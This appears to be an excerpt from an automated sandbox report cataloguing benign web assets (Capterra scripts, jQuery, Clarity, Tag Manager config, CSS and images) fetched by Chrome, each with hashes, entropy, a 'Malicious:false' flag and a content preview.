                                                                                                                                                                                                        SHA-512:657AA9F1F79E9E50BA01FE68B3C68928D0F7F1B6090759F9D6EB69538DFF187D0128E3AD1D65DE8233ACC7E24BFCB97D7FD415139BC841B2B9992A06F48C70B7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/286-50ca3ddc4bf7f5f7.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[286],{58291:function(e,t){"use strict";function n(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return n}})},41616:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43157
                                                                                                                                                                                                        Entropy (8bit):6.040809323233645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:GVg2pSErZTlFDqBYHI9vuNlPFgRngSxC7aZbXvTl/x90aDJEj46Nwo05npEZrr:ZErNOBNKPFgxFXZ7Tl/zFEj4KHwpE5
                                                                                                                                                                                                        MD5:1ED2EA6546D512C55C2B894A9B9EBA2D
                                                                                                                                                                                                        SHA1:6FC9A835B7429448C4CED7DA9958B66AFBD3E97A
                                                                                                                                                                                                        SHA-256:81BBBD92C7A245624A5CE9CFE9138344152480CD4AE9A695C0787B6F912B03AB
                                                                                                                                                                                                        SHA-512:AFA6564ED219F588399BD9BC2874CA93905E79D9CD2E0AE2B0EE69DE76EED6B11942C665DB049BC70F0AD3D79C16B1F186AC81F1DA9965458A728725BC1B4325
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/mailchimp_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>3</title>. <defs>. <path d="M10.325,0 L107.675,0 C113.37734,0 118,4.62265996 118,10.325 L118,107.675 C118,113.37734 113.37734,118 107.675,118 L10.325,118 C4.62265996,118 0,113.37734 0,107.675 L0,10.325 C0,4.62265996 4.62265996,0 10.325,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" operator="out" resu
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):86062
                                                                                                                                                                                                        Entropy (8bit):7.992258333420081
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:dPf5FDbC4HC2IpT6DC9XGpze6xw3+k5MLlwZs/Na0LkpnDiv2ISw7EJIfLapv7Ct:YFFpp93L3ELGZ+E0YUv2I3sIT3t
                                                                                                                                                                                                        MD5:11B64851C13A3485D02ECE05FE99EBEE
                                                                                                                                                                                                        SHA1:2975C415269AD823906121F37C7E2224CDF026C9
                                                                                                                                                                                                        SHA-256:BF205EB11E302A07064044B2A78B83F06480D2A884EFE1BDD9A913167FFEA513
                                                                                                                                                                                                        SHA-512:1D502BB9C4DBB6A02C099EF700DB9A58C6FBBF95DAFA3EF9CC1A7E733F8F04181BE32B0D7795B4FFEE167F4CFD47CDD282B9F99DF0702CDC01706AA14735246C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/template1-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTELiq...............NNN.......0S..........?`.......>_.=^.>_......D........!Ab.:\............... @a....7Y#9.......>Zv.........",.."...........#....6K.....7Rp......j.f.,R.Ll38".6.............@......&F.;X.Ga.9A..}k$..<E#(V.,..HQ#3T..q_A...e.,.Xy........;.)Nx.cTs.p.HF 6.}B?.".Sp.FO.EH3%($8:T;7ARj1)D.Xr..XN...;60.bZRS/.v...9^.+17VQV...U\...iFJMe.......fM.#1c~Wu..zNO.v....US/?[.sX2)*...NNH&Fhf...N@..JbE.\\d|.aY^)`.DBV\_:CX73..wnmJo..lc7T.h..z{ygjeF>&.....LXx..)R.......K55...MKd.....q..,5LS?C.|.,?Hh.?Hf.yn?*$..'0E/...hhgx9?GC...Cc.]L:b7<...z..^fr...vc........UoMl{.t]]aYKgkP...YBNYi...htygg*r;6|oV...scAdh.Zm.2Cl...x2u....yu..............y..k.su."E]3)v.....Tf^.]?>UZ}.J.......2N.........y......*FE.3g......Q"#W....Mf...6.Nz..a.c..=...J|..+p..\.`hz....tRNS..........Ew..l......pHYs............... .IDATx...P......L.i..._..."..t..C <B.......[x0. . ,....v.01#.D#!.W08F.X.q.TP...1H.?.%.....&xpL^35irhO&...7k?..&....bVb..G...._{....z.]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65179), with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):65276
                                                                                                                                                                                                        Entropy (8bit):5.3532603082235495
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:A5D99eR7s83Hw4oUGaOGE477KiIY0MnZez7S7nM1En0wEJPddhMJCvOWIjQS31F:uDmFs83Hw47ZO7S7nwEYvoQSFF
                                                                                                                                                                                                        MD5:49357BD476BF9E4BF2A6992AB7374F1F
                                                                                                                                                                                                        SHA1:5D75E26D106AD28B5700FE46E13C2EA4BD467AD8
                                                                                                                                                                                                        SHA-256:264532AF47B2CFB6620970592478C442A0CD429BECCEAD9D062FF5A91284DC15
                                                                                                                                                                                                        SHA-512:622A895FA8E419D80D2EB6EF6D310897C303E1226D7B83F78FDF19DBECDABADEE9D54BFFB7DFF4CF325DFB385EF44FA6C5D6407B86C9F5B3D04E3EDA31EADD41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.clarity.ms/s/0.7.45/clarity.js
                                                                                                                                                                                                        Preview:/* clarity-js v0.7.45: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return jr},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return Ar}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callbacks(){return $r},get clear(){return ui},get consent(){return oi},get data(){return Qr},get electron(){return ti},
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10559), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10559
                                                                                                                                                                                                        Entropy (8bit):5.205836284897392
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Hr15CKrIJCG4rsCN1CdSVrp8CYZxNJCyr9ECHmv+0CqJzCichCTfOW5Q:84oC7CMKZBCv+0CychCs
                                                                                                                                                                                                        MD5:A8EF35D495116E7F38E2B38A8DF36F58
                                                                                                                                                                                                        SHA1:19B353EED618F2F104CABDB45E5814236BF369DD
                                                                                                                                                                                                        SHA-256:74098E06C3841CF93E2DCF0F0FBBCD2FA7DD727E531B28CA253B69076066E862
                                                                                                                                                                                                        SHA-512:F6A91A1DAE37B364A713D30074701311C73C783E9303B1CA77020E4696D5A5DA8A76E4EF2149418E9F40F9FB35895DF85F1FBB21EB3A9D205DF26282E0D190C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/779-e50b3615e84c36b9.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[779],{78283:function(r,t,e){e.d(t,{Z:function(){return v}});var n=e(2784),o=e(2550),i=e(16734);function a(r){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var c=["gapless","align","className","children"];function l(){return(l=Object.assign?Object.assign.bind():function(r){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n])}return r}).apply(this,arguments)}var u=e(25632);function f(r){return(f="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var s=["variant","className","children"];function b(){return(b=Object.assign?Object.as
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65264), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):591601
                                                                                                                                                                                                        Entropy (8bit):5.037969635434341
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:KvxDgsrbehAThEUgDnyCenlAZ6i9qyywr:2xDgfDny4Pywr
                                                                                                                                                                                                        MD5:0C2335D8C374986809103007186797D2
                                                                                                                                                                                                        SHA1:6791A3899FDBF45BE08886C176B36338BD925D34
                                                                                                                                                                                                        SHA-256:9C95F27B4AA3964346F9F719FA3ABE5B08CD44E0EDA50F039470490590F1D1AC
                                                                                                                                                                                                        SHA-512:EA0EB968B6D87AA3471EC27F51F0DC277E757BD0B3DB4EE642576AE5BCF22245DD19A555D2EDA44A5635DDE3D91A949FE72D0B7CD5E98E50FD98041862213B42
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/1_c19ab23/public/build/static/css/main.8d93b826.css
                                                                                                                                                                                                        Preview:*,:after,:before{border:0 solid #e5e7eb;box-sizing:border-box}:after,:before{--tw-content:""}html{-webkit-text-size-adjust:100%;font-family:var(--spectrum-alias-body-text-font-family);line-height:1.5;tab-size:4}body{line-height:inherit;margin:0}hr{border-top-width:1px;color:inherit;height:0}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:initial}sub{bottom:-.25em}sup{top:-.5em}table{border-collapse:collapse;border-color:inherit;text-indent:0}button,input,optgroup,select,textarea{color:inherit;font-family:inherit;font-size:100%;line-height:inherit;margin:0;padding:0}button,select{text-transform:none}[ty
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19901), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):19901
                                                                                                                                                                                                        Entropy (8bit):5.043622321466294
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:kqs2fhM2rYFLY5rEoFf8IFEtXyHCuUTfMpVfeaLXXzh//Y/H:V/pzdwfMpVfR+H
                                                                                                                                                                                                        MD5:8239AEE2019C9503EFD109CBDEFDF435
                                                                                                                                                                                                        SHA1:D9FBD6C5B7BB3F748CC1388A43793A1100F1BF50
                                                                                                                                                                                                        SHA-256:1A174CA2245A28175C42703108EDBC4DA6D6260BA5F5D6C18A264F46A2078C4E
                                                                                                                                                                                                        SHA-512:583A30BAA2FB721A20C08A625597E0D58BA6EAA4E23B6BE928F90A712D3F47365048DAA9F4433239EAD71EADF39428F54D7E00A5E279BBC072BD1C2045FA99F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/9488-a623a4335ba00507.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9488],{49488:function(r,e,o){o.d(e,{m:function(){return O}});var t=/^\[(.+)\]$/;function n(r,e){var o=r;return e.split("-").forEach(function(r){o.nextPart.has(r)||o.nextPart.set(r,{nextPart:new Map,validators:[]}),o=o.nextPart.get(r)}),o}var i=/\s+/;function l(){for(var r,e,o=0,t="";o<arguments.length;)(r=arguments[o++])&&(e=function r(e){if("string"==typeof e)return e;for(var o,t="",n=0;n<e.length;n++)e[n]&&(o=r(e[n]))&&(t&&(t+=" "),t+=o);return t}(r))&&(t&&(t+=" "),t+=e);return t}function a(r){var e=function(e){return e[r]||[]};return e.isThemeGetter=!0,e}var s=/^\[(?:([a-z-]+):)?(.+)\]$/i,c=/^\d+\/\d+$/,d=new Set(["px","full","screen"]),u=/^(\d+(\.\d+)?)?(xs|sm|md|lg|xl)$/,p=/\d+(%|px|r?em|[sdl]?v([hwib]|min|max)|pt|pc|in|cm|mm|cap|ch|ex|r?lh|cq(w|h|i|b|min|max))|\b(calc|min|max|clamp)\(.+\)|^0$/,f=/^-?((\d+)?\.?(\d+)[a-z]+|0)_-?((\d+)?\.?(\d+)[a-z]+|0)/;function b(r){return y(r)||d.has(r)||c.test(r)||m(r)}functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):129281
                                                                                                                                                                                                        Entropy (8bit):7.994367080488959
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:3CXexy1BoEfeSiGmoL0iTQQC7lDUonnAZk1tqfzr1K8kL:3mec13fHiTM0imJAZrLrg7L
                                                                                                                                                                                                        MD5:9505138DF129DCE0DAB3692D3DE59F21
                                                                                                                                                                                                        SHA1:447574F9DC7C84A990850272E3D7D022ED6E2C07
                                                                                                                                                                                                        SHA-256:4CAE660B40F12B34EA4ECBE54ECD11DAF41D4B48702B07B8E13391594F1D0CDD
                                                                                                                                                                                                        SHA-512:2B3FB9628A4E9FAD6B6D2594134351C2CFA61772391212EEC5C9751F7EF6B789D0C7EB81BD1DA7F919D8A19C4201E584AF2015331F0C2A993B9E4A91DF4D172D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/template5-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE...........baa.F...........000..........b!.b..a .a .b .a..a.....`.....a!..........^.....^....._!3-)......=2+...:+%.\..b$9<2@B7....c....!..JF8UF40& 15...n5.kicQ.g,.~I.v>[N;.u( ....H</.R....LL>...q4/.....G0'V0#'-'.f%....R^\L....}.].a.tlXc2 ...kQ6._..c....RSE.l$......\q6!...;'..jJ.u_.._".M)bI2......x@.kCI)..L..sQ.; uW:...V..^.]VD._.]2.k..wTH/.wcG......rJ.]9..V....5......e1.S+.f....:..jYB..k.eC.~.z9...c.zQ.D.0.[=d;.tB(.|,.1..n$.....[(.s9..W.wB.QZ*..=.b=)..._S>%T7...A.u .?..}...S...e(...n3.n.B.......j...M.....O..z.....+.......t..MpF...a...n,.....f./..........}N0.m.u..w..F.E.s<.w7..c.....Y=...[Q....J....f..F.cJ"uS".........u.U..~..Y..f...c..d...... .vuk..u....t....(....../.P.....s.w.s.]...^.R.+..3...{.a.Q....tRNS............v.K..d....pHYs............... .IDATx...#I.7:.3U........s.$+a..#.L".9.B...L(..!.+.A...2J....8;....6...P.s..........^.L}T...?.....>.R*?..9q>...=.=.=.=.=.=.=.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54335
                                                                                                                                                                                                        Entropy (8bit):7.990119241419708
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:utSS1uxdkiEOzim6WW5d6Wo3raBi09Rf9:uYxdkPZJWWLBia9
                                                                                                                                                                                                        MD5:4EC6A4EA5DDBFF3DE814E6F1233E36BE
                                                                                                                                                                                                        SHA1:3A47687B47B43B8F1A105C8B103D36548DE05A4F
                                                                                                                                                                                                        SHA-256:561EF859B06E2EBD6BB37200780C2ADB4CB64482B1FE931B612162BCD1E8CDE1
                                                                                                                                                                                                        SHA-512:4FF1E31608643C6D6A72ECBEBEA751C9F621F9863EEABBA51B52C24B328CB8C0C7B662515E4F70CD70D53D60C838D181A380C9541AF1D484E1A04216DC37AE08
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTELiqaaa...........................:<JFHUZZZ...........S.....H=...........;;>......KD;..O.........`]U......ogJ....!4...,-=..................#.."..#.. ........$.. .. .. ..".. ..".."..... ..!..".. .....!.. ........... ..'..... ............z{...... ......#....!.....&.. ........ ....... #.................... ............. ...{........ux....$.......%'$.....#WZ#............9;.-0$R0.!"......_c#...HJ.'(....[9"23......,.....AC.^`... ,-....69$FJ$67Ffj$NR$PR.nq........gD,fh...0LN[01A>A$WY.YZf.......................%'7..#.......!.................vR8.....$*,<....jkv...nr%....%^`l..%pr|..._D #5cep..$..!..#...RT`..$qy.@BP..#=?M...jO.......0O..#....tY..#.U....hz.EGU.~d......J*..Ah...".........}.......58I.....f...n...e..\qwy........4...u:TS(BC!|.Kgf|}r^RFE.....n....tRNS......................,..p....^.F:.L.;......w.......pHYs............... .IDATx..k...........v...=..z....(...2#....!A.#.t(....!@.........[[....b.Q...$c8....$.#i.|.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9721
                                                                                                                                                                                                        Entropy (8bit):5.35902308660375
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:6KyAQgtNBIWguxw68uCZItctpwfTh3fYwuoOE5YBTi+Q+Qsf1POyj/0Pp5b5ffv7:04rsCJ9cO51r
                                                                                                                                                                                                        MD5:17E5CF7E2FCAED7692184F43C4577219
                                                                                                                                                                                                        SHA1:F47F0887E191E30A49391514CEDDABFC26CC9BD7
                                                                                                                                                                                                        SHA-256:09B627933E01FAA4979DC5661F7E616C7DB1C12EA1984CA0549BDB253D24DA9B
                                                                                                                                                                                                        SHA-512:30ADC60FD2051044E070F467D1AB46AFE0071D3D4B410527C68684014BF9D9D0A1CE0371EF4E02F02C6017AF2D0D53B4EFAED72D0FB0644B5514FA26D1A521F9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:. {. "name": "otCenterRounded",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90Q2VudGVyUm91bmRlZCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciIgcm9sZT0iYWxlcnRkaWFsb2ciIGFyaWEtZGVzY3JpYmVkYnk9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij48ZGl2IGNsYXNzPSJvdC1zZGstcm93Ij48ZGl2IGlkPSJvbmV0cnVzdC1ncm91cC1jb250YWluZXIiIGNsYXNzPSJvdC1zZGstdHdlbHZlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1wb2xpY3kiPjxkaXYgY2xhc3M9ImJhbm5lci1oZWFkZXIiPjxkaXYgY2xhc3M9ImJhbm5lcl9sb2dvIj48L2Rpdj48L2Rpdj48aDIgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gyPjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij50ZXh0PGEgaHJlZj0iIyI+cG9saWN5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Im90LWRwZC1jb250YWluZXIiPjxoMyBjbGFzcz0ib3QtZHBkLXRpdGxlIj48L2gzPjxkaXYgY2xhc3M9Im90LWRwZC1jb250ZW50Ij48cCBjbGFzcz0ib3QtZHBkLWRlc2MiPjwvcD48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJiYW5uZXItb3B0aW9ucyI+PGRpdiBjbGFzcz0iYmFubmVyLW9wdGlvbiI+PGJ1dHRvbiBhcmlhLWV4cGFuZGVkPSJmYWxzZSIgY2xhc3M9ImJhbm5lci1vcHRpb24taW5wdXQiPjxzcGFuIGNsYXNzP
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4179)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):222149
                                                                                                                                                                                                        Entropy (8bit):5.54303714538197
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:kSAdB6sivz0G6M5DzelEZtNAJ0ZLtpOGK:bAv6sczFeWdaGK
                                                                                                                                                                                                        MD5:F5404FBAF1EE02C0433FAC423ADDAA33
                                                                                                                                                                                                        SHA1:810E428971534A6C7A12658317B4059ADF265FA0
                                                                                                                                                                                                        SHA-256:136C761C04165311450782BDB46FE84A021400AC384993079B1C5EBCE89F9F3C
                                                                                                                                                                                                        SHA-512:0B3D5CAF7CA6497B21C54D4D45223554C9CFD693DBFD2CA58177709345779D9F836FF791A0F79C8E50DE10D7583ED6FF69A5798D761D09861D05FC0DF3AC08BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/destination?id=DC-8036043&l=dataLayer&cx=c
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-8036043","vtp_remoteConfig":["map"],"tag_id":5},{"function":"__ogt_dma","priority":0,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":8},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):89476
                                                                                                                                                                                                        Entropy (8bit):5.2896589255084425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                                        MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                                                                        SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                                        SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                                        SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11897), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11897
                                                                                                                                                                                                        Entropy (8bit):5.374339678987172
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:02GDnLI5hqI1MQlbgKlq5PcrTJT7QWepwd78qg0FZrqpNj5/+vNv1CPI3E1:ELLITsKlqPubd7i0F9PK
                                                                                                                                                                                                        MD5:268B90396B896F06BFC62613C7FBFD44
                                                                                                                                                                                                        SHA1:98666368AF88733887B6FCD7AADD43072370F8E8
                                                                                                                                                                                                        SHA-256:897804D7144868CDB08EFA8E8A31CE0E9579962257037059239F804080626DEC
                                                                                                                                                                                                        SHA-512:F99E5EE064594A0E2A359B1DFF1D4C68CF7666CB941EE9BD59A01B134E320D4049FC196D5F67AAA0FEFB88BFE784565F02B79421071D0FC166B2EAE65BCBD4EB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[847],{29312:function(e,t,r){"use strict";r.d(t,{R:function(){return x}});var n=r(52322);r(2784);var s=r(13980),l=r.n(s),i=r(87254),a=r(65313),o=r(51334),c=r(35763),d=r(89407),u=r.n(d);let x=e=>{let{label:t,value:r,items:s}=e;return(0,n.jsxs)(a.Z,{className:u().control,children:[(0,n.jsx)(o.Z,{className:u().label,children:t}),(0,n.jsx)("div",{className:"rx-grow",children:(0,n.jsxs)(c.P,{value:r,onChange:t=>{let{onChange:r}=e;r(t.target.value)},placeholder:i.ag._({id:"N40H+G"}),"data-testid":"filter-by",children:[(0,n.jsx)(c.P.Item,{value:"all","data-testid":"filter-by-item",children:i.ag._({id:"N40H+G"})}),s.map(e=>{let{id:t,name:r}=e;return(0,n.jsx)(c.P.Item,{value:t,"data-testid":"filter-by-item",children:r},t)})]})})]})};x.propTypes={label:l().string,value:l().string,onChange:l().func.isRequired,items:l().arrayOf(l().shape({id:l().string.isRequired,name:l().string.isRequired}))}},43360:function(e,t,r){"use strict";r.d(t,{Z:func
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (577)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5105
                                                                                                                                                                                                        Entropy (8bit):4.9980534017840785
